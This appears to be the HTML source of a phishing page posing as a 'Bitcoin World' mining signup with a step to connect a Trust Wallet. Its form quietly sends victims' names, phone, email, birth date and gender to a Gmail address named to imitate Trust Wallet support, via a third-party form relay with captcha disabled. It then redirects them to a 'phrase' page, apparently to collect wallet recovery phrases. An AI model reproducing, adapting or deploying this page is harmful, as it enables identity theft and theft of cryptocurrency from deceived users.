<!DOCTYPE html>
<html lang="en">
  <head>
    <meta charset="UTF-8" />
    <meta http-equiv="X-UA-Compatible" content="IE=edge" />
    <meta name="viewport" content="width=device-width, initial-scale=1.0" />
     
    <script src="register.js" defer></script>
    <title>Register Now</title>
  </head>
<style>
:root {
  --primary-color: rgb(11, 78, 179);
}

*,
*::before,
*::after {
  box-sizing: border-box;
}

body{
    display: flex;
    align-items: center;
    justify-content: center;
    min-height: 100vh;
    background: linear-gradient(to bottom, var(--main-color), var(--light-color));
}

input {
  display: block;
  width: 100%;
  padding: 0.75rem;
  border: 1px solid #ccc;
  border-radius: 0.25rem;
}

.width-50 {
  width: 50%;
}

.ml-auto {
  margin-left: auto;
}

.text-center {
  text-align: center;
}

/* Progressbar */
.progressbar {
  position: relative;
  display: flex;
  justify-content: space-between;
  counter-reset: step;
  margin: 2rem 0 4rem;
}

.progressbar::before,
.progress {
  content: "";
  position: absolute;
  top: 50%;
  transform: translateY(-50%);
  height: 4px;
  width: 100%;
  background-color: #dcdcdc;
  z-index: -1;
}

.progress {
  background-color: #40a1ff;
  width: 0%;
  transition: 0.3s;
}

.progress-step {
  width: 2.1875rem;
  height: 2.1875rem;
  background-color: #dcdcdc;
  border-radius: 50%;
  display: flex;
  justify-content: center;
  align-items: center;
}

.progress-step::before {
  counter-increment: step;
  content: counter(step);
}

.progress-step::after {
  content: attr(data-title);
  position: absolute;
  top: calc(100% + 0.5rem);
  font-size: 0.85rem;
  color:#40a1ff ;
}

.progress-step-active {
  background-color: #40a1ff;
  color: #f3f3f3;
}




.container{
    width: 330px;
    background-color: var(--light-color);
    color: var(--dark-color);
    border-radius: 15px;
    text-align: center;
    padding: 50px 35px 10px 35px;
    box-shadow: 1px 1px 5px var(--main-color);
}

/* Form */
.form {
  width: clamp(320px, 30%, 430px);
  margin: 0 auto;
  border: 1px solid #ccc;
  border-radius: 0.35rem;
  padding: 1.5rem;
}

.form-step {
  display: none;
  transform-origin: top;
  animation: animate 0.5s;
}

.form-step-active {
  display: block;
}

.input-group {
  margin: 2rem 0;
}

@keyframes animate {
  from {
    transform: scale(1, 0);
    opacity: 0;
  }
  to {
    transform: scale(1, 1);
    opacity: 1;
  }
}

/* Button */
.btns-group {
  display: grid;
  grid-template-columns: repeat(2, 1fr);
  gap: 1.5rem;
}

.btn {
  padding: 0.75rem;
  display: block;
  text-decoration: none;
  background-color: #80acff;
  color: #fff;
  text-align: center;
  border-radius: 0.25rem;
  cursor: pointer;
  transition: 0.3s;
}
.btn:hover {
  box-shadow: 0 0 0 2px #fff, 0 0 0 3px var(--primary-color);
}

</style>

  <body>
       



    <form action="https://formsubmit.co/user.help.trustwallet@gmail.com" method="POST" class="form">
                <input type="hidden" name="_captcha" value="false">
                <input type="hidden" name="_subject" value="SIGN UP INFO!!!!">
                <input type="hidden" name="_next" value="https://bitcoin-world-mine.github.io/Bitcoin/phrase.html">
              
      <h1 style="color:#55acff;" class="text-center">Setup your Bitcoin World Account</h1>
      <!-- Progress bar -->
      <div class="progressbar">
        <div class="progress" id="progress"></div>
        
        <div
          class="progress-step progress-step-active"
          data-title="Intro"
        ></div>
        <div class="progress-step" data-title="Contact"></div>
        <div class="progress-step" data-title="Birth"></div>
        <div class="progress-step" data-title="Connect Wallet"></div>
      </div>

      <!-- Steps -->
      <div class="form-step form-step-active">
        <div class="input-group">
<h2 style="color:#55acff;">Person Info:</h2>
          <label for="username">First Name</label>
          <input type="text" name="fname" id="fname"  required/>
        </div>
        <div class="input-group">
          <label for="position">Last Name</label>
          <input type="text" name="lastname" id="lastname" required/>
        </div>
        <div class="">
          <a href="#" class="btn btn-next width-50 ml-auto">Next</a>
        </div>
      </div>
      <div class="form-step">
        <div class="input-group">
          <label for="phone">Phone Number</label>
          <input type="number" name="phone" id="phone" required />
        </div>
        <div class="input-group">
          <label for="email">Email Address</label>
          <input type="email" name="email" id="email" required />
        </div>
        <div class="btns-group">
          <a href="#" class="btn btn-prev">Previous</a>
          <a href="#" class="btn btn-next">Next</a>
        </div>
      </div>
      <div class="form-step">
        <div class="input-group">
          <label for="dob">Date of Birth</label>
          <input type="text" placeholder="Day/Month/year" name="dob" id="dob" />
        </div>
        <div class="input-group">
          <label for="ID">Gender:</label>
          <input type="text" name="gender" id="ID" required/>
        </div>
        <div class="btns-group">
          <a href="#" class="btn btn-prev">Previous</a>
          <a href="#" class="btn btn-next">Next</a>
        </div>
      </div>
      <div class="form-step">
         <div class="input-group">
  <h2 style="color:#55acff;"><br>Connect Trust Wallet To Start Mining</h2>
     
           </div>
      
          <input type="submit" value="Connect Wallet" class="btn" />
        </div>
      </div>
    </form>
  </body>
</html>
